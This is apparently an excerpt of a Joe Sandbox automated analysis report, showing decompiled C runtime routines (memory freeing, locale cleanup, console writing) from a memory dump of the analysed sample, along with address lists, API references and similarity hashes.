                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                                                            • Opcode ID: 130c3cbe9f5b55d1d60b3d44c15f02de2a2639de3f61f8e701d9b0251358e727
                                                                                                                                                                                                                                                                            • Instruction ID: 64987e9290fe35de8c231581ce8fda528538d48f1fdb16b899abba979f737a26
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 130c3cbe9f5b55d1d60b3d44c15f02de2a2639de3f61f8e701d9b0251358e727
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D314171604B02EFDB326A38DC45B5E77E5AF80310F11C429E49DDB2A1DF79AC818B12
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00379D5C(char _a4) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t26 = _a4;
                                                                                                                                                                                                                                                                            				_t52 =  *_a4;
                                                                                                                                                                                                                                                                            				if( *_a4 != 0x3c8098) {
                                                                                                                                                                                                                                                                            					E0037A8FB(_t52);
                                                                                                                                                                                                                                                                            					_t26 = _a4;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                                                            				E0037A8FB( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                                                            				_v8 =  &_a4;
                                                                                                                                                                                                                                                                            				E00379C22(5,  &_v8);
                                                                                                                                                                                                                                                                            				_v8 =  &_a4;
                                                                                                                                                                                                                                                                            				return E00379C72(4,  &_v8);
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x00379d62
                                                                                                                                                                                                                                                                            0x00379d65
                                                                                                                                                                                                                                                                            0x00379d6d
                                                                                                                                                                                                                                                                            0x00379d70
                                                                                                                                                                                                                                                                            0x00379d75
                                                                                                                                                                                                                                                                            0x00379d78
                                                                                                                                                                                                                                                                            0x00379d7c
                                                                                                                                                                                                                                                                            0x00379d87
                                                                                                                                                                                                                                                                            0x00379d92
                                                                                                                                                                                                                                                                            0x00379d9d
                                                                                                                                                                                                                                                                            0x00379da8
                                                                                                                                                                                                                                                                            0x00379db3
                                                                                                                                                                                                                                                                            0x00379dbe
                                                                                                                                                                                                                                                                            0x00379dc9
                                                                                                                                                                                                                                                                            0x00379dd7
                                                                                                                                                                                                                                                                            0x00379ddf
                                                                                                                                                                                                                                                                            0x00379de8
                                                                                                                                                                                                                                                                            0x00379df0
                                                                                                                                                                                                                                                                            0x00379e04

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379D70
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: HeapFree.KERNEL32(00000000,00000000,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?), ref: 0037A911
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: GetLastError.KERNEL32(?,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?,?), ref: 0037A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379D7C
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379D87
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379D92
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379D9D
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379DA8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379DB3
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379DBE
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379DC9
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00379DD7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: 94056d045dfca1eef06f3bda730b7ab9cdb12e9c924b6ef53afd99e8dc02254e
                                                                                                                                                                                                                                                                            • Instruction ID: 3026596763226219073f114777f2752ca6a9a3af2b23cb37df57e9570e11ebbf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94056d045dfca1eef06f3bda730b7ab9cdb12e9c924b6ef53afd99e8dc02254e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B11E775600949FFCB12EF58C886C9C3FA5EF44340F018055F9495F222D635DA929B42
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                                                            			E00383441(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed char _v15;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void _v24;
                                                                                                                                                                                                                                                                            				short _v28;
                                                                                                                                                                                                                                                                            				char _v31;
                                                                                                                                                                                                                                                                            				void _v32;
                                                                                                                                                                                                                                                                            				long _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				signed char* _v52;
                                                                                                                                                                                                                                                                            				long _v56;
                                                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                                                                            				int _t86;
                                                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                                                            				long _t97;
                                                                                                                                                                                                                                                                            				void _t105;
                                                                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                                                            				signed int _t118;
                                                                                                                                                                                                                                                                            				signed char _t123;
                                                                                                                                                                                                                                                                            				signed char _t128;
                                                                                                                                                                                                                                                                            				intOrPtr _t129;
                                                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                                                            				signed char* _t133;
                                                                                                                                                                                                                                                                            				intOrPtr* _t135;
                                                                                                                                                                                                                                                                            				signed int _t136;
                                                                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t78 =  *0x40db44; // 0x1f0d8c9c
                                                                                                                                                                                                                                                                            				_v8 = _t78 ^ _t136;
                                                                                                                                                                                                                                                                            				_t80 = _a8;
                                                                                                                                                                                                                                                                            				_t118 = _t80 >> 6;
                                                                                                                                                                                                                                                                            				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                                                                                                                                                                                            				_t133 = _a12;
                                                                                                                                                                                                                                                                            				_v52 = _t133;
                                                                                                                                                                                                                                                                            				_v48 = _t118;
                                                                                                                                                                                                                                                                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x40e600 + _t118 * 4)) + _t116 + 0x18));
                                                                                                                                                                                                                                                                            				_v40 = _a16 + _t133;
                                                                                                                                                                                                                                                                            				_t86 = GetConsoleCP();
                                                                                                                                                                                                                                                                            				_t135 = _a4;
                                                                                                                                                                                                                                                                            				_v60 = _t86;
                                                                                                                                                                                                                                                                            				 *_t135 = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                                                                                                                                                                                            				while(_t133 < _v40) {
                                                                                                                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                                                                                                                            					_v31 =  *_t133;
                                                                                                                                                                                                                                                                            					_t129 =  *((intOrPtr*)(0x40e600 + _v48 * 4));
                                                                                                                                                                                                                                                                            					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                                                                                                                                                                                            					if((_t123 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                            						if(( *(E00379A59(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                                                                                                                                                                                            							_push(1);
                                                                                                                                                                                                                                                                            							_push(_t133);
                                                                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							if(_t133 >= _v40) {
                                                                                                                                                                                                                                                                            								_t131 = _v48;
                                                                                                                                                                                                                                                                            								 *((char*)( *((intOrPtr*)(0x40e600 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                                                                                                                                                                                            								 *( *((intOrPtr*)(0x40e600 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x40e600 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t112 = E00382A0F( &_v28, _t133, 2);
                                                                                                                                                                                                                                                                            								_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                            								if(_t112 != 0xffffffff) {
                                                                                                                                                                                                                                                                            									_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                            									goto L9;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t128 = _t123 & 0x000000fb;
                                                                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                                                                                                                                                                                            						_push(2);
                                                                                                                                                                                                                                                                            						_v15 = _t128;
                                                                                                                                                                                                                                                                            						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                                                                                                                                                                                            						_push( &_v16);
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						_push( &_v28);
                                                                                                                                                                                                                                                                            						_t94 = E00382A0F();
                                                                                                                                                                                                                                                                            						_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                            						if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                                                            							_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                            							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                                                                                                                                                                                            							_v56 = _t97;
                                                                                                                                                                                                                                                                            							if(_t97 != 0) {
                                                                                                                                                                                                                                                                            								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                            									L19:
                                                                                                                                                                                                                                                                            									 *_t135 = GetLastError();
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                                                                                                                                                                                            									if(_v36 >= _v56) {
                                                                                                                                                                                                                                                                            										if(_v31 != 0xa) {
                                                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_t105 = 0xd;
                                                                                                                                                                                                                                                                            											_v32 = _t105;
                                                                                                                                                                                                                                                                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												if(_v36 >= 1) {
                                                                                                                                                                                                                                                                            													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                                                                                                                                                                                            													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                            													goto L16;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                                                            				return E0037DE3E(_v8 ^ _t136);
                                                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                                                            0x00383449
                                                                                                                                                                                                                                                                            0x00383450
                                                                                                                                                                                                                                                                            0x00383453
                                                                                                                                                                                                                                                                            0x0038345b
                                                                                                                                                                                                                                                                            0x0038345f
                                                                                                                                                                                                                                                                            0x0038346b
                                                                                                                                                                                                                                                                            0x0038346e
                                                                                                                                                                                                                                                                            0x00383471
                                                                                                                                                                                                                                                                            0x00383478
                                                                                                                                                                                                                                                                            0x00383480
                                                                                                                                                                                                                                                                            0x00383483
                                                                                                                                                                                                                                                                            0x00383489
                                                                                                                                                                                                                                                                            0x0038348f
                                                                                                                                                                                                                                                                            0x00383494
                                                                                                                                                                                                                                                                            0x00383496
                                                                                                                                                                                                                                                                            0x00383499
                                                                                                                                                                                                                                                                            0x0038349e
                                                                                                                                                                                                                                                                            0x003834a8
                                                                                                                                                                                                                                                                            0x003834af
                                                                                                                                                                                                                                                                            0x003834b2
                                                                                                                                                                                                                                                                            0x003834b9
                                                                                                                                                                                                                                                                            0x003834c0
                                                                                                                                                                                                                                                                            0x003834ec
                                                                                                                                                                                                                                                                            0x00383512
                                                                                                                                                                                                                                                                            0x00383514
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003834ee
                                                                                                                                                                                                                                                                            0x003834f1
                                                                                                                                                                                                                                                                            0x003835b8
                                                                                                                                                                                                                                                                            0x003835c4
                                                                                                                                                                                                                                                                            0x003835cf
                                                                                                                                                                                                                                                                            0x003835d4
                                                                                                                                                                                                                                                                            0x003834f7
                                                                                                                                                                                                                                                                            0x003834fe
                                                                                                                                                                                                                                                                            0x00383503
                                                                                                                                                                                                                                                                            0x00383509
                                                                                                                                                                                                                                                                            0x0038350f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0038350f
                                                                                                                                                                                                                                                                            0x00383509
                                                                                                                                                                                                                                                                            0x003834f1
                                                                                                                                                                                                                                                                            0x003834c2
                                                                                                                                                                                                                                                                            0x003834c6
                                                                                                                                                                                                                                                                            0x003834c9
                                                                                                                                                                                                                                                                            0x003834cf
                                                                                                                                                                                                                                                                            0x003834d1
                                                                                                                                                                                                                                                                            0x003834d4
                                                                                                                                                                                                                                                                            0x003834d8
                                                                                                                                                                                                                                                                            0x00383515
                                                                                                                                                                                                                                                                            0x00383518
                                                                                                                                                                                                                                                                            0x00383519
                                                                                                                                                                                                                                                                            0x0038351e
                                                                                                                                                                                                                                                                            0x00383524
                                                                                                                                                                                                                                                                            0x0038352a
                                                                                                                                                                                                                                                                            0x00383539
                                                                                                                                                                                                                                                                            0x0038353f
                                                                                                                                                                                                                                                                            0x00383545
                                                                                                                                                                                                                                                                            0x0038354a
                                                                                                                                                                                                                                                                            0x00383566
                                                                                                                                                                                                                                                                            0x003835d9
                                                                                                                                                                                                                                                                            0x003835df
                                                                                                                                                                                                                                                                            0x00383568
                                                                                                                                                                                                                                                                            0x00383570
                                                                                                                                                                                                                                                                            0x00383579
                                                                                                                                                                                                                                                                            0x0038357f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00383581
                                                                                                                                                                                                                                                                            0x00383583
                                                                                                                                                                                                                                                                            0x00383586
                                                                                                                                                                                                                                                                            0x0038359f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003835a1
                                                                                                                                                                                                                                                                            0x003835a5
                                                                                                                                                                                                                                                                            0x003835a7
                                                                                                                                                                                                                                                                            0x003835aa
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003835aa
                                                                                                                                                                                                                                                                            0x003835a5
                                                                                                                                                                                                                                                                            0x0038359f
                                                                                                                                                                                                                                                                            0x0038357f
                                                                                                                                                                                                                                                                            0x00383579
                                                                                                                                                                                                                                                                            0x00383566
                                                                                                                                                                                                                                                                            0x0038354a
                                                                                                                                                                                                                                                                            0x00383524
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x003835ad
                                                                                                                                                                                                                                                                            0x003835ad
                                                                                                                                                                                                                                                                            0x003835e1
                                                                                                                                                                                                                                                                            0x003835f3

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00383BB6,?,00000000,?,00000000,00000000), ref: 00383483
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 003834FE
                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00383519
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0038353F
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,00383BB6,00000000,?,?,?,?,?,?,?,?,?,00383BB6,?), ref: 0038355E
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00383BB6,00000000,?,?,?,?,?,?,?,?,?,00383BB6,?), ref: 00383597
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6d828b5b63e340606a87e59c29958f5e12c9ec24c3f173a8802afe518f1adc55
                                                                                                                                                                                                                                                                            • Instruction ID: fb871113c0b4ee8269f9220da0f6ad0bd76ee8eff903405fd600c9591d6b2cde
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d828b5b63e340606a87e59c29958f5e12c9ec24c3f173a8802afe518f1adc55
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551D3B0A003099FDF11DFA8D845AEEBBF8EF09700F1445AAE951E7391E7309A41CB64
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037BE58(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t45 = _a4;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45, 7);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0x98, 2);
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                                                            					E0037BE1C(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                                                            					E0037A8FB( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                                                            					return E0037A8FB( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x0037be5e
                                                                                                                                                                                                                                                                            0x0037be63
                                                                                                                                                                                                                                                                            0x0037be6c
                                                                                                                                                                                                                                                                            0x0037be77
                                                                                                                                                                                                                                                                            0x0037be82
                                                                                                                                                                                                                                                                            0x0037be8d
                                                                                                                                                                                                                                                                            0x0037be9b
                                                                                                                                                                                                                                                                            0x0037bea6
                                                                                                                                                                                                                                                                            0x0037beb1
                                                                                                                                                                                                                                                                            0x0037bebc
                                                                                                                                                                                                                                                                            0x0037beca
                                                                                                                                                                                                                                                                            0x0037bed8
                                                                                                                                                                                                                                                                            0x0037bee9
                                                                                                                                                                                                                                                                            0x0037bef7
                                                                                                                                                                                                                                                                            0x0037bf05
                                                                                                                                                                                                                                                                            0x0037bf10
                                                                                                                                                                                                                                                                            0x0037bf1b
                                                                                                                                                                                                                                                                            0x0037bf26
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037bf36
                                                                                                                                                                                                                                                                            0x0037bf3b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0037BE1C: _free.LIBCMT ref: 0037BE45
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BEA6
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: HeapFree.KERNEL32(00000000,00000000,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?), ref: 0037A911
                                                                                                                                                                                                                                                                              • Part of subcall function 0037A8FB: GetLastError.KERNEL32(?,?,0037BE4A,?,00000000,?,00000000,?,0037BE71,?,00000007,?,?,0037AFE5,?,?), ref: 0037A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BEB1
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BEBC
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BF10
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BF1B
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BF26
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0037BF31
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: e4ce2cea6e840e59eda562638da99292204e46b41f2237d8919655a512d606d5
                                                                                                                                                                                                                                                                            • Instruction ID: c06945609cff2fcd8cdb14838a1e50f1db1599c29fbd31d3e423864a54bc82bb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4ce2cea6e840e59eda562638da99292204e46b41f2237d8919655a512d606d5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E113D71540B08FAD532BBB0DC0BFCBFBAC5F44700F408825B29DAE762DB79A5954692
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E0037F644(void* __ecx) {
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if( *0x40db70 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_t25 = GetLastError();
                                                                                                                                                                                                                                                                            					_t11 = E003808BE(__eflags,  *0x40db70);
                                                                                                                                                                                                                                                                            					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                                                            					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                                                                            						_t11 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						__eflags = _t11;
                                                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                                                            							_t4 = E003808F8(__eflags,  *0x40db70, 0xffffffff);
                                                                                                                                                                                                                                                                            							_pop(_t16);
                                                                                                                                                                                                                                                                            							__eflags = _t4;
                                                                                                                                                                                                                                                                            							if(_t4 != 0) {
                                                                                                                                                                                                                                                                            								_t28 = E0037A89E(_t16, 1, 0x28);
